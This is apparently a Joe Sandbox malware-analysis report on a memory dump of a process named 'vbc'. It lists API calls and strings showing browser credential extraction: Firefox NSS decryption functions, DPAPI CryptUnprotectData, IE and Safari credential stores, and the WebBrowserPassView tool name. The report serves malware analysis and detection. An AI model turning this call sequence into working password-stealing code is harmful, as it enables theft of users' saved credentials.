                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2081463915-0
                                                                                                                                                    • Opcode ID: 47d81a72ba5e86c6c08ea2f576f41ce6956625c552654a9f8307a541cecd461b
                                                                                                                                                    • Instruction ID: a3dc623871aa55e9e138b6aa735e1cfc4d22eb4fa3c35538bc996f6fefcd79cf
                                                                                                                                                    • Opcode Fuzzy Hash: 47d81a72ba5e86c6c08ea2f576f41ce6956625c552654a9f8307a541cecd461b
                                                                                                                                                    • Instruction Fuzzy Hash: 65113A75600A05AFCB14DF69C9C19ABB7F8FF04314B10463EA456E7241DB34E9458F68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00405137: CloseHandle.KERNEL32(000000FF,004050C7,00000000,?,00408B2E,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat,?,?,?,00409013,?,004091EB,000000FF), ref: 0040513F
                                                                                                                                                      • Part of subcall function 00407144: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00408B2E,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat,?,?,?,00409013,?,004091EB,000000FF,00000000,00000104), ref: 00405124
                                                                                                                                                      • Part of subcall function 00407B93: ReadFile.KERNELBASE(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2136311172-0
                                                                                                                                                    • Opcode ID: e1fa86938fa3109ce0b7763a12cdd910979c4d4d9c688e98096abe29a5a3520b
                                                                                                                                                    • Instruction ID: 849b43cde7c86ee220a2fa92f028283b8c7de21471a02e191cd59f19f3ad1342
                                                                                                                                                    • Opcode Fuzzy Hash: e1fa86938fa3109ce0b7763a12cdd910979c4d4d9c688e98096abe29a5a3520b
                                                                                                                                                    • Instruction Fuzzy Hash: DD0181B1815A008AD720AB65DC057A776E8DF11319F10893FE5A5EF2C2EB7C94408E6E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00408604: ??3@YAXPAX@Z.MSVCRT ref: 0040860B
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004085F4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@??3@
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1936579350-0
                                                                                                                                                    • Opcode ID: 5a3d051f7edf17afde60994ac7c6eb2327cdbc01eacff9d86a6927654e89a2fe
                                                                                                                                                    • Instruction ID: 922d8024f7c410ba2bf811e6c001bae8f16a2ee087a1061d919dd730706e44d9
                                                                                                                                                    • Opcode Fuzzy Hash: 5a3d051f7edf17afde60994ac7c6eb2327cdbc01eacff9d86a6927654e89a2fe
                                                                                                                                                    • Instruction Fuzzy Hash: 36C02B3241D2101FD764FFB4360205722D4CE822383014C2FF0C0D3100DD3884014B4C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • free.MSVCRT(00000000,00408352,00000000,?,00000000), ref: 0040803E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                    • Opcode ID: b8cd1effcdf29b95293438428d1a83d87b736904a3019313e09548ab324a0620
                                                                                                                                                    • Instruction ID: b2304b4461d9917b15a132db01dd128865174dbe20628525ae7b4e3248e143f9
                                                                                                                                                    • Opcode Fuzzy Hash: b8cd1effcdf29b95293438428d1a83d87b736904a3019313e09548ab324a0620
                                                                                                                                                    • Instruction Fuzzy Hash: 17C08CB24107018FF7308F11C905322B3E4AF0073BFA08C0EA0D0914C2DBBCD084CA08
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • free.MSVCRT(00000000,0040E508,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 0040277F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                    • Opcode ID: 12e10aa5a455c2b2122ca5546f3d5514bdec465a3aa4be4c1af19d6b195196c9
                                                                                                                                                    • Instruction ID: cac01d1bc301b84fbdbddb48431dcac5afc2edf88536e2650f831a4bf4b80b8a
                                                                                                                                                    • Opcode Fuzzy Hash: 12e10aa5a455c2b2122ca5546f3d5514bdec465a3aa4be4c1af19d6b195196c9
                                                                                                                                                    • Instruction Fuzzy Hash: 7AC00272550B019FF7609F15C94A762B3E4AF5077BF918C1DA4A5924C1E7BCD4448A18
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                    • Opcode ID: b450fec74f7795ac9fca528e737bf449a82a962f0464f52a5a7c386dc31c5c02
                                                                                                                                                    • Instruction ID: 46b4f55e9d8111901284769a6e1cf788246b5727949f953e2d9518689c8df02f
                                                                                                                                                    • Opcode Fuzzy Hash: b450fec74f7795ac9fca528e737bf449a82a962f0464f52a5a7c386dc31c5c02
                                                                                                                                                    • Instruction Fuzzy Hash: AC900282455501216C4522755D1750511080851176374074A7032A59D1DE688150601C
Uniqueness
Uniqueness Score: -1.00%
APIs
• memset.MSVCRT ref: 004419A0
• wcscpy.MSVCRT ref: 004419B7
• memset.MSVCRT ref: 004419EA
• wcscpy.MSVCRT ref: 00441A00
• wcscat.MSVCRT ref: 00441A11
• wcscpy.MSVCRT ref: 00441A37
• wcscat.MSVCRT ref: 00441A48
• wcscpy.MSVCRT ref: 00441A6F
• wcscat.MSVCRT ref: 00441A80
• GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441A8F
• LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441AA6
• LoadLibraryW.KERNEL32(sqlite3.dll,?,00000104,00000000), ref: 00441AB9
• LoadLibraryW.KERNEL32(mozsqlite3.dll,?,00000104,00000000), ref: 00441AC7
• LoadLibraryW.KERNEL32(nss3.dll,?,00000104,00000000), ref: 00441AD7
• GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00441AF3
• GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00441AFF
• GetProcAddress.KERNEL32(?,sqlite3_step), ref: 00441B0C
• GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 00441B19
• GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 00441B26
• GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 00441B33
• GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 00441B40
• GetProcAddress.KERNEL32(?,sqlite3_close), ref: 00441B4D
• GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 00441B5A
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Similarity
• API ID: AddressProc$LibraryLoadwcscpy$wcscat$memset$HandleModule
• String ID: \mozsqlite3.dll$\nss3.dll$\sqlite3.dll$mozsqlite3.dll$nss3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
• API String ID: 2522319644-522817110
• Opcode ID: 8848e67c20b1512477d94237df3342a95449e5598eedc60463cf29981b84716b
• Instruction ID: 320c17c5e6ace6947bedab1e2bf77c9c6d077df099d9b5840aba930edb5fc244
• Opcode Fuzzy Hash: 8848e67c20b1512477d94237df3342a95449e5598eedc60463cf29981b84716b
• Instruction Fuzzy Hash: 855165B1901709BADB20FFB18D49A4BB7F8AF08704F5008ABE54AE2551E778E644CF18
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Similarity
• API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
• String ID:
• API String ID: 4218492932-0
• Opcode ID: 91481d4031c4b0f89b54af3f497fb88c2307565dbaae607565dd24303698038d
• Instruction ID: b821822af8fa1f08beba458ee4fa97db6355aebb6f9a48b4278dc6bbcb45c8c8
• Opcode Fuzzy Hash: 91481d4031c4b0f89b54af3f497fb88c2307565dbaae607565dd24303698038d
• Instruction Fuzzy Hash: 601163F3900118ABDB00EFA4DC899DAB7ACEF19710F454536FA09DB144E674E748C7A9
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetLastError.KERNEL32 ref: 00415B06
  • Part of subcall function 00414BCA: GetVersionExW.KERNEL32(?), ref: 00414BED
• FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00415B2D
• FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00415B56
• LocalFree.KERNEL32(?), ref: 00415B71
• free.MSVCRT(?,0044A338,?), ref: 00415B9F
  • Part of subcall function 00414C63: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,75145970,?,00414D8E,?), ref: 00414C81
  • Part of subcall function 00414C63: malloc.MSVCRT ref: 00414C88
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Similarity
• API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
• String ID: OsError 0x%x (%u)
• API String ID: 2360000266-2664311388
• Opcode ID: b92bfb85b135c96f8b850ddecf84185ea98de4423d487b3975f43b970985a80a
• Instruction ID: b695a5953d892c14765524e538430075cec87daac3f875befcc4cde39e80dde6
• Opcode Fuzzy Hash: b92bfb85b135c96f8b850ddecf84185ea98de4423d487b3975f43b970985a80a
• Instruction Fuzzy Hash: 5F118E34A00218BBDB21AFA19C49CDFBF78EF85B51B104067F405A2250D6795B809BA9
Uniqueness
Uniqueness Score: -1.00%
APIs
• FindFirstFileW.KERNEL32(00000000,?,00000000,nss3.dll,00000000), ref: 00407E26
• FindNextFileW.KERNEL32(00000000,?), ref: 00407E45
• FindClose.KERNEL32(00000000), ref: 00407E65
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID: .$ld@$nss3.dll
• API String ID: 3541575487-3654816495
• Opcode ID: cc7230da910be55964706480e184fd4a449cc4274279a5797c2cb2fba6568da8
• Instruction ID: 78963b1eb2bf7b5f8aa15039180698213c9a680973a94e339c68aae197af375e
• Opcode Fuzzy Hash: cc7230da910be55964706480e184fd4a449cc4274279a5797c2cb2fba6568da8
• Instruction Fuzzy Hash: CEF0BB75901528ABDB206BB4DC8C9ABB7ACEB45765F0401B2ED06E3180D334AE458AD9
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 004074C6: GetTempPathW.KERNEL32(00000104,?), ref: 004074DD
  • Part of subcall function 004074C6: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004074EF
  • Part of subcall function 004074C6: GetTempFileNameW.KERNELBASE(?,00000000,00000000,?), ref: 00407506
• OpenClipboard.USER32(?), ref: 0040D6B0
• GetLastError.KERNEL32 ref: 0040D6C9
• DeleteFileW.KERNEL32(?), ref: 0040D6E8
  • Part of subcall function 00407363: EmptyClipboard.USER32 ref: 0040736D
  • Part of subcall function 00407363: GetFileSize.KERNEL32(00000000,00000000), ref: 0040738A
  • Part of subcall function 00407363: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040739B
  • Part of subcall function 00407363: GlobalLock.KERNEL32 ref: 004073A8
  • Part of subcall function 00407363: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004073BB
  • Part of subcall function 00407363: GlobalUnlock.KERNEL32(00000000), ref: 004073CD
  • Part of subcall function 00407363: SetClipboardData.USER32 ref: 004073D6
  • Part of subcall function 00407363: CloseHandle.KERNEL32(?), ref: 004073EA
  • Part of subcall function 00407363: CloseClipboard.USER32 ref: 004073FE
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Similarity
• API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
• String ID:
• API String ID: 2633007058-0
• Opcode ID: 27fa221fbd852bde5ab3e37b7c4579dba1b3dae105a290b2fbc18255b5855c3f
• Instruction ID: bc74c52ab6c87c34bb6cce86e30c95d4cd513021a264dd7f219e40d67a453ac4
• Opcode Fuzzy Hash: 27fa221fbd852bde5ab3e37b7c4579dba1b3dae105a290b2fbc18255b5855c3f
• Instruction Fuzzy Hash: 45F0C831B0030457EB646B71DC4EFAF376DAB40B01F00057AF469A51E2EFBAF9458A59
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetVersionExW.KERNEL32(00450DA8,0000001A,00412291), ref: 0040768E
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
• Opcode ID: b36f1e02b416ec865f4d87fb5f88c2c9fdef71dbbf2c75f0f10f81923867f6e4
• Instruction ID: 443b7a688d421a19dce43b17e8414db768b780ab8005fe7e93b00bb89c3c7b35
• Opcode Fuzzy Hash: b36f1e02b416ec865f4d87fb5f88c2c9fdef71dbbf2c75f0f10f81923867f6e4
• Instruction Fuzzy Hash: 76C0803C5002205FD7C04B88BC047C375B85B86727F004073ED40A1251C378680CCF9C
Uniqueness
Uniqueness Score: -1.00%
APIs
• _wcsicmp.MSVCRT ref: 00402201
• _wcsicmp.MSVCRT ref: 00402231
• _wcsicmp.MSVCRT ref: 0040225E
• _wcsicmp.MSVCRT ref: 0040228B
  • Part of subcall function 0040805C: wcslen.MSVCRT ref: 0040806F
  • Part of subcall function 0040805C: memcpy.MSVCRT ref: 0040808E
• memset.MSVCRT ref: 0040262F
• memcpy.MSVCRT ref: 00402664
  • Part of subcall function 00403853: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004026AC,?,00000090,00000000,?), ref: 00403862
  • Part of subcall function 00403853: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403874
  • Part of subcall function 00403853: FreeLibrary.KERNEL32(00000000), ref: 00403897
• memcpy.MSVCRT ref: 004026C0
• LocalFree.KERNEL32(?,?,?,00000000,?,00000090,00000000,?), ref: 0040271E
• FreeLibrary.KERNEL32(00000000,?,00000090,00000000,?), ref: 0040272D
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Similarity
• API ID: _wcsicmp$FreeLibrarymemcpy$AddressLoadLocalProcmemsetwcslen
• String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
• API String ID: 462158748-1134094380
• Opcode ID: 77a1b1b6f1160c8da7bc509bbcfd5bc0ca8aed1e625a5ef69c1f2e6acdd1c49f
• Instruction ID: cc44404655acc20b5533cc0c34fbbab0c7f11d0fd0cfcd5d05bb593c6a12ed59
• Opcode Fuzzy Hash: 77a1b1b6f1160c8da7bc509bbcfd5bc0ca8aed1e625a5ef69c1f2e6acdd1c49f
                                                                                                                                                    • Instruction Fuzzy Hash: C9F1FF208087E9C9DB32D7788D097CEBE645B23324F0443D9E1E87A2D2D7B55B85CB66
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
• String ID: :stringdata$dpapi:$ftp://$http://$https://$internet explorer$wininetcachecredentials
• API String ID: 2787044678-1843504584
• Opcode ID: cb6674861b630e023730bc8514c911496a266ea8c7e3a43a84e29182814d6b93
• Instruction ID: bbe16b9e6473d86cc6eed57c0ed50d6d6787e5e5d2f3b2995f82d19aea11410f
• Opcode Fuzzy Hash: cb6674861b630e023730bc8514c911496a266ea8c7e3a43a84e29182814d6b93
• Instruction Fuzzy Hash: 2891A571940209BFEF20EF55CD41EDF77A8AF54314F10006AF848A3292EB79EE508B68
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32 ref: 00411421
• GetDlgItem.USER32 ref: 0041142D
• GetWindowLongW.USER32(00000000,000000F0), ref: 0041143C
• GetWindowLongW.USER32(?,000000F0), ref: 00411448
• GetWindowLongW.USER32(00000000,000000EC), ref: 00411451
• GetWindowLongW.USER32(?,000000EC), ref: 0041145D
• GetWindowRect.USER32 ref: 0041146F
• GetWindowRect.USER32 ref: 0041147A
• MapWindowPoints.USER32 ref: 0041148E
• MapWindowPoints.USER32 ref: 0041149C
• GetDC.USER32 ref: 004114D5
• wcslen.MSVCRT ref: 00411515
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00411526
• ReleaseDC.USER32 ref: 00411573
• _snwprintf.MSVCRT ref: 00411636
• SetWindowTextW.USER32(?,?), ref: 0041164A
• SetWindowTextW.USER32(?,00000000), ref: 00411668
• GetDlgItem.USER32 ref: 0041169E
• GetWindowRect.USER32 ref: 004116AE
• MapWindowPoints.USER32 ref: 004116BC
• GetClientRect.USER32 ref: 004116D3
• GetWindowRect.USER32 ref: 004116DD
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00411723
• GetClientRect.USER32 ref: 0041172D
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00411765
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
• String ID: %s:$EDIT$STATIC
• API String ID: 2080319088-3046471546
• Opcode ID: 82769fcda4aee539b94f7460eafa85e4f9ca3f83dedf5f01e4882f05d4beebf3
• Instruction ID: 8ff438caca04d900f401a49fee0f0db12add2221ca5be9c1dac879361ae65e4d
• Opcode Fuzzy Hash: 82769fcda4aee539b94f7460eafa85e4f9ca3f83dedf5f01e4882f05d4beebf3
• Instruction Fuzzy Hash: E3B1B071108341AFD720DF68C985E6BBBF9FB88704F004A2DF69692261DB75E944CF16
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
• String ID: WebBrowserPassView
• API String ID: 829165378-2171583229
• Opcode ID: 9528d28c6aa400cf950dedba09aaaf40a629cdba61218975bccd681405960fd9
• Instruction ID: 8d9c6eba8ddb3a7c26c98eaf12cf57faa7ce2db5dd3d1d54ce32cd9ff2fd20fc
• Opcode Fuzzy Hash: 9528d28c6aa400cf950dedba09aaaf40a629cdba61218975bccd681405960fd9
• Instruction Fuzzy Hash: 8C517E35500308BBDB22AF64DC45E6E7BB5FB04742F104A7AF952A66F0C774AE50EB18
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
• {Unknown}, xrefs: 0040F831
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 0040FA0E
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
• String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
• API String ID: 4111938811-1819279800
• Opcode ID: 4192c38ce99e2e5d3a4b6b431755b06133974f066cfd60dedb09103ebde27fd1
• Instruction ID: 69e9f0bde0ef3093fe47e3bafb281a214b560c7f74f151c34d98b156b899ddfd
• Opcode Fuzzy Hash: 4192c38ce99e2e5d3a4b6b431755b06133974f066cfd60dedb09103ebde27fd1
• Instruction Fuzzy Hash: F7719FB680121DBEEF219B50DC45EDA7B6CEF08355F0000B6F508A21A1DA799E88CF69
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040FB20
• GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 0040FB69
• SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 0040FB76
• memset.MSVCRT ref: 0040FB90
• wcslen.MSVCRT ref: 0040FB9D
• wcslen.MSVCRT ref: 0040FBAC
• GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040FBE7
• LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC03
• LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC1A
• GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040FC2F
• GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040FC3B
• GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040FC47
• GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040FC53
• GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040FC5F
• GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040FC6B
• GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040FC77
  • Part of subcall function 0040648C: memset.MSVCRT ref: 004064AD
  • Part of subcall function 0040648C: memset.MSVCRT ref: 004064FA
  • Part of subcall function 0040648C: RegCloseKey.ADVAPI32(0040FB38), ref: 00406634
  • Part of subcall function 0040648C: wcscpy.MSVCRT ref: 00406642
  • Part of subcall function 0040648C: ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406659
  • Part of subcall function 0040648C: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406695
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressProc$memset$CurrentDirectory$LibraryLoadwcslen$CloseEnvironmentExpandHandleModuleStringswcscpy
• String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
• API String ID: 2554026968-4029219660
• Opcode ID: 7b5db3b0d5bf1743c32fccddbb21aa02e391161234974de8ca04521cdbb317a2
• Instruction ID: eeb2f36212a21d3aa086fe7dd3a0485c0e35c5a93e030d286215ed8b11f998db
• Opcode Fuzzy Hash: 7b5db3b0d5bf1743c32fccddbb21aa02e391161234974de8ca04521cdbb317a2
• Instruction Fuzzy Hash: 15418371940309ABEB209F61CC85E9AB7F8BF58744F10087EE58593191EBB999848F58
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memsetwcscpy$wcslen$_snwprintf$wcscat
                                                                                                                                                    • String ID: General$IsRelative$Path$Profile%d$profiles.ini
                                                                                                                                                    • API String ID: 3014334669-2600475665
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040A2C8: LoadMenuW.USER32 ref: 0040A2D0
• SetMenu.USER32(?,00000000), ref: 0040D2E0
• CreateStatusWindowW.COMCTL32(50000000,Function_000434FC,?,00000101), ref: 0040D2FB
• SendMessageW.USER32(00000000,00000404,00000001,?), ref: 0040D313
• GetModuleHandleW.KERNEL32(00000000), ref: 0040D322
• LoadImageW.USER32 ref: 0040D32F
• CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 0040D359
• GetModuleHandleW.KERNEL32(00000000), ref: 0040D366
• CreateWindowExW.USER32 ref: 0040D38D
• GetFileAttributesW.KERNEL32(004518A8,?,00000000,/nosaveload,00000000,00000001), ref: 0040D468
• GetTempPathW.KERNEL32(00000104,004518A8,?,00000000,/nosaveload,00000000,00000001), ref: 0040D478
• wcslen.MSVCRT ref: 0040D47F
• wcslen.MSVCRT ref: 0040D48D
• RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001,?,00000000,/nosaveload,00000000,00000001), ref: 0040D4DA
• SendMessageW.USER32(?,00000404,00000002,?), ref: 0040D515
• SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0040D528
  • Part of subcall function 00403A14: wcslen.MSVCRT ref: 00403A31
  • Part of subcall function 00403A14: SendMessageW.USER32(?,00001061,?,?), ref: 00403A55
• API ID: Message$Send$CreateWindowwcslen$HandleLoadMenuModule$AttributesFileImagePathRegisterStatusTempToolbar
